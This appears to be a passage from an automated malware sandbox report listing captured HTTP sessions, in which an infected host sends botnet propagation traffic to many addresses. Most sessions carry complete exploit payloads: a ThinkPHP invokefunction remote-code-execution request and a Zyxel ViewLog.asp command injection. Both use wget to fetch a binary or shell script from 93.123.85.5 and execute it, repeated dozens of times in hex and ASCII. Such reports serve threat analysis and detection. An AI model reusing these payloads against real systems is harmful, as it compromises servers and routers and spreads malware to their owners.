                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              418192.168.2.233757095.86.122.22380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.801326036 CET8585OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              419192.168.2.235193095.57.7.12580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:09.126209021 CET8595OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:09.516849995 CET8611INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:19:09.517474890 CET8612INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              42192.168.2.233670231.136.234.98080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:14.652301073 CET1885OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:15.667435884 CET1990OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.651185989 CET2240OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:21.778645992 CET2805OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.713609934 CET3786OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.583575964 CET5638OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:18.091330051 CET9679OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              42031.16.184.1508080192.168.2.2333020
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:09.128273964 CET8596INHTTP/1.1 400 Bad Request
                                                              Content-Length: 23
                                                              Content-Type: text/plain
                                                              Data Raw: 49 6c 6c 65 67 61 6c 20 65 6e 64 20 6f 66 20 68 65 61 64 65 72 73 2e
                                                              Data Ascii: Illegal end of headers.
                                                              Nov 13, 2023 22:19:10.126396894 CET8714INHTTP/1.1 400 Bad Request
                                                              Content-Length: 23
                                                              Content-Type: text/plain
                                                              Data Raw: 49 6c 6c 65 67 61 6c 20 65 6e 64 20 6f 66 20 68 65 61 64 65 72 73 2e
                                                              Data Ascii: Illegal end of headers.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              421192.168.2.2336562112.125.223.1780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:09.430953026 CET8609OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:09.743972063 CET8637INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:37 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              422192.168.2.2338412112.74.84.6180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:09.447468042 CET8610OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:09.777194023 CET8648INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.17.2
                                                              Date: Mon, 13 Nov 2023 21:19:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 157
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.17.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              423192.168.2.2344394112.199.121.6680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:09.466217995 CET8611OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:09.815124989 CET8648INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              424192.168.2.233519031.136.192.98080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.213969946 CET8727OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.244203091 CET8848OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:13.259988070 CET9074OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:17.323451996 CET9576OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:25.514357090 CET10520OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.644179106 CET12501OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.427807093 CET16797OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              425192.168.2.234671294.187.106.1978080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.225110054 CET8728OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              426192.168.2.235190294.122.117.1398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.226547956 CET8729OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              427192.168.2.235311294.122.215.2148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.228517056 CET8729OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              428192.168.2.234566894.122.61.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.229368925 CET8730OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              429192.168.2.235793094.123.255.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.229643106 CET8731OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              43192.168.2.234912031.136.174.1338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:14.652789116 CET1885OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:15.667428970 CET1989OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.651200056 CET2241OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:21.778642893 CET2805OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
